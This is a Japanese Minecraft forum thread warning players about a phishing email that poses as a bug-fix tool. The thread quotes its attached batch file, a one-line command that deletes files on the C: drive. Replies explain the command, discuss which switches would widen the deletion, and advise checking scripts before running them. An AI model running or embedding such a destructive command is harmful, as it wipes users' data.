注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

ゲーム全般の雑談はこちらでどうぞ!
  • (PostNo.13501)

注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by うがたく » 2011年11月22日(火) 01:03

昨日のことです。
"MINECRAFT" <m1753901563@eco-summer.info>というところから「MINECRAFT1.00 の不具合修復ツール」
というメールが届きました。

以下文面
「この度は、MINECRAFT1.00のご利用をまことにご利用を感謝しております
ご利用いただいているMINECRAFTは、ゲーム中のバグによりゲームが起動できない
ということにより、わがしゃ“MINECRAFT.JP”よりバグ復元ツールをお送りいた
します。また、ご利用に問題点ふぁあった場合には、このメールアドレス宛てに
、お送りください。 それでは、MINECRAFT LIFEをお楽しみください。
 MINECRAFT,batのご使用方法
1、minecraft2をダブルクリックしていただくだけです

注意
 もし、MEINCRAFTに変化が起きない場合パソコンを再起動してください」

添付ファイルは「minecraft2.bat」というバッチファイルでした。
中身を見たら
@Echo off
Del C:\ *.* |y

と書かれていました。
何と危険なファイルでしょう!
友達はこれを起動してしまいパソコン終わったと言っていました。
それも馬鹿だとは思うのですが...

みなさんも気を付けましょう。
修正されるどころかパソコンが逝きますよ(笑)
うがたく
ID:db864c45
水から上がったとこ
 
記事: 3
登録日時: 2011年11月22日(火) 00:45

  • (PostNo.13505)

Re: MINECRAFT1.00 の不具合修復ツール

投稿記事by alice » 2011年11月22日(火) 01:11

この手のメールはよくあることなんですが…マイクラにまで及びましたか。
それから、タイトルが適切じゃない気がします。
不具合修復ツールを装った悪質なメールに注意にした方がよろしいかと。
アバター
alice
ID:56c9adf6
金掘り
 
記事: 441
登録日時: 2011年10月23日(日) 20:10
お住まい: 舞天市

  • (PostNo.13563)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by remove » 2011年11月22日(火) 17:23

batファイルの中身は誰かが真似してやりそうなので伏せたほうがいいのでは・・・?
:not: :swi:      :cre:
remove
ID:6118778e
木を殴ってる
 
記事: 29
登録日時: 2011年8月26日(金) 20:55

  • (PostNo.13564)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by miyabi » 2011年11月22日(火) 17:28

remove さんが書きました:batファイルの中身は誰かが真似してやりそうなので伏せたほうがいいのでは・・・?

さすがにこの手の行動を取るような人なら、この程度のbatファイルは記述できるでしょうから、
こういう内容の物は実行しない方がよい、という意味で公開していても大丈夫だと思いますよ。
マイクラサーバを立てる前に、PCの基礎知識を身につけましょう。
サーバ管理補助ツール MCSC(Windows専用) の開発をしたり、Minecraft Modding Wikiの管理したりしてます。
アバター
miyabi
ID:91b90127
ブタ飼い
 
記事: 6814
登録日時: 2011年8月07日(日) 14:35
お住まい: さいたまさいたまさいたま!

  • (PostNo.13571)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by こども店長 » 2011年11月22日(火) 17:56

Cを丸ごとデリート… おぉ 怖い怖い
ひっそりとMOD作ってます。
和風の世界にタイムスリップ!---和風MOD
さまざまなロボットで進攻せよ!---ロボットMOD
非公式フォーラムのEdoCraftにも技術協力しています。
こども店長
ID:4dd3d296
大工さん
 
記事: 52
登録日時: 2011年7月27日(水) 00:09

  • (PostNo.13577)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by Ci_ren » 2011年11月22日(火) 19:09

ところでこういう危険な内容の記述はVistaからは実行前に警告を出すと聞いたんですがまさか出ないんですか?
・・・あ、確認なんてしないでくださいw
本業は作曲などの音声関係です。
メイドさんのテクスチャパックやモデル作ったりしてます。
アバター
Ci_ren
ID:705840ff
金掘り
 
記事: 471
登録日時: 2011年9月21日(水) 15:58

  • (PostNo.13604)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by Lucifer » 2011年11月22日(火) 21:30

15分メールのアドレスですね・・・。(eco-summer.info)誰かの悪戯だと思いますが、度が過ぎてる。
実行したらたまったもんじゃない。実行する前にチェックするっていうのは重要ですね。
コミュニケーションが苦手である
軽いコミュ症and心気症です。最悪の組み合わせ
アバター
Lucifer
ID:a21d3827
石掘り
 
記事: 94
登録日時: 2011年6月21日(火) 07:54
お住まい: 日本・神奈川県 Mine市Craft町

  • (PostNo.13613)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装し

投稿記事by karura » 2011年11月22日(火) 22:13

こういうのは普通にあることではないかな?

(わからない人のために、Delは削除 C:/ はハードディスクのこと。
つまり、ハードディスク内のデーターを全削除)
karura
ID:eb1d123b
石掘り
 
記事: 113
登録日時: 2011年9月01日(木) 13:13
お住まい: マルチサーバー

  • (PostNo.13620)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by Ci_ren » 2011年11月22日(火) 22:50

確か*.*は~から先とかいう意味だった気がするので全体を意訳すると
@Echo off=あなたに報告するか→No
Del C:\ *.* |y=消す→Cドライブから先(つまりCドライブ全て)|実行

つまり「あなたに報告せずにCドライブ全ての削除を実行します」
ですな。

こんな簡単だけど危険なコードなのに対策されてなかったっけかなぁ・・・
本業は作曲などの音声関係です。
メイドさんのテクスチャパックやモデル作ったりしてます。
アバター
Ci_ren
ID:705840ff
金掘り
 
記事: 471
登録日時: 2011年9月21日(水) 15:58

  • (PostNo.13621)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by miyabi » 2011年11月22日(火) 22:56

Ci_ren さんが書きました:確か*.*は~から先とかいう意味だった気がするので全体を意訳すると
@Echo off=あなたに報告するか→No
Del C:\ *.* |y=消す→Cドライブから先(つまりCドライブ全て)|実行

つまり「あなたに報告せずにCドライブ全ての削除を実行します」
ですな。

こんな簡単だけど危険なコードなのに対策されてなかったっけかなぁ・・・

Vista以降でUAC有効にして、一般ユーザでログインしていれば、
システムファイルの削除は多分権限不足で止まる気がします。
が、XPであったり管理者として実行してたりすると、多分アウトですね。
# 試せないので推測ですが。
マイクラサーバを立てる前に、PCの基礎知識を身につけましょう。
サーバ管理補助ツール MCSC(Windows専用) の開発をしたり、Minecraft Modding Wikiの管理したりしてます。
アバター
miyabi
ID:91b90127
ブタ飼い
 
記事: 6814
登録日時: 2011年8月07日(日) 14:35
お住まい: さいたまさいたまさいたま!

  • (PostNo.13817)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by ゆーり » 2011年11月24日(木) 01:41

マイクラの利用状況とメールアドレスがどこから割れたのか気になりますが
アバター
ゆーり
ID:dd701ab2
水から上がったとこ
 
記事: 3
登録日時: 2011年7月22日(金) 14:15

  • (PostNo.13823)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by include » 2011年11月24日(木) 03:08

ゆーり さんが書きました:マイクラの利用状況とメールアドレスがどこから割れたのか気になりますが

よくあるspamでは?
別に送信者は受信者がマイクラプレイヤーかどうか気にする必要はないでしょうし。
include
ID:bcf2ca51
水から上がったとこ
 
記事: 3
登録日時: 2011年11月02日(水) 17:45

  • (PostNo.13826)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by alice » 2011年11月24日(木) 03:30

Ci_ren さんが書きました:確か*.*は~から先とかいう意味だった気がするので全体を意訳すると
@Echo off=あなたに報告するか→No
Del C:\ *.* |y=消す→Cドライブから先(つまりCドライブ全て)|実行

つまり「あなたに報告せずにCドライブ全ての削除を実行します」
ですな。

こんな簡単だけど危険なコードなのに対策されてなかったっけかなぁ・・・


/Sが無いのでC:ドライブのルートにあるファイルだけ消すだけですね。
起動に必要なシステムファイル(ntldr、ntdetect.com、boot.ini)が消えるので、再起動したらデュアルブートでない限り再インストール確定。
ただ、このファイルは通常であれば書き込み禁止、不可視、システム属性を設定してあるはずなので、/F、/A:-Iを指定しない限りは無視されるんですが…
画竜点睛とはこのことでしょうかね。
アバター
alice
ID:56c9adf6
金掘り
 
記事: 441
登録日時: 2011年10月23日(日) 20:10
お住まい: 舞天市

  • (PostNo.13909)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by hato3 » 2011年11月24日(木) 23:30

バッチでもマルウェア扱いになるようなので(以前経験有り)、関連会社に報告希望です。
私が代わりに送ります、と言いたいのですがウイルス的なものを送ったり受け取ったりするのは危険なので。すいません。

参考リンク

・ウイルスチェック
http://www.virustotal.com/

・検体提出関連
http://rosafe.rowiki.jp/index.php?%B8%A ... D%D0%C0%E8
http://www13.atwiki.jp/pheasantworks/pages/17.html
hato3
ID:1286d91f
石掘り
 
記事: 108
登録日時: 2011年8月28日(日) 19:50

  • (PostNo.45834)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by Kenty(dkddkddkdkdk) » 2012年7月04日(水) 17:38

こんな子供でも作れるようなファイルなのに…

Batファイルを開くときは中身を見たほうがいいですね :sig:
テクスチャまた作り始めてるけど全部データ消えたから最初からになった


死にたい
アバター
Kenty(dkddkddkdkdk)
ID:a4afce58
石掘り
 
記事: 103
登録日時: 2012年5月21日(月) 19:08
お住まい: ツンドラバイオームの端っこ

  • (PostNo.46820)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by ”i”39 » 2012年7月13日(金) 11:53

ツッコミどころが満載だなー

1.ツールじゃないし、バッチだし
2.誤字多すぎワラエナイ
3.MINECRAFT.JPってなんだよ
4.バグ復元ツールって書いてあるけどさ?バグを復元したらやばいんじゃないの?
5.「もし、MEINCRAFTに変化が起きない場合パソコンを再起動してください」ローマ字で「メインクラフト」って読めばいいのかなww
「わがしゃ」ってご丁寧に平仮名で書いてあるところがなんかさ?
世の中にはこーゆーことをガチでやるやつがいるから恐ろしいわ
画像
お約束
クモたんをいじめないであげて(´;ω;`)ブワッ

気まぐれでゲーム作ったりしてます。
”i”39
ID:e6f5d63e
大工さん
 
記事: 48
登録日時: 2012年5月03日(木) 16:44
お住まい: 住んでるところがお住まいさ!

  • (PostNo.177105)

Re: 注意!!:MINECRAFT1.00の不具合修復を偽装した悪質なツール

投稿記事by Slipstream » 2014年6月09日(月) 23:22

前にもこんな悪質プログラム見た気がしますね。
htmlと同じくらい簡単に書けますし、バッチファイルを開くときはメモ帳で中身を確認するとか対策が必要ですね。
そもそもメールで来たファイルを開いてはいけませんが。
マイクラをしてない人にまで被害が広がらなければいいのですが。
And he was never seen again...
Slipstream
ID:3838b7de
石炭掘り
 
記事: 208
登録日時: 2014年3月11日(火) 23:52
お住まい: 博多市(福岡市)


Return to 雑談全般

x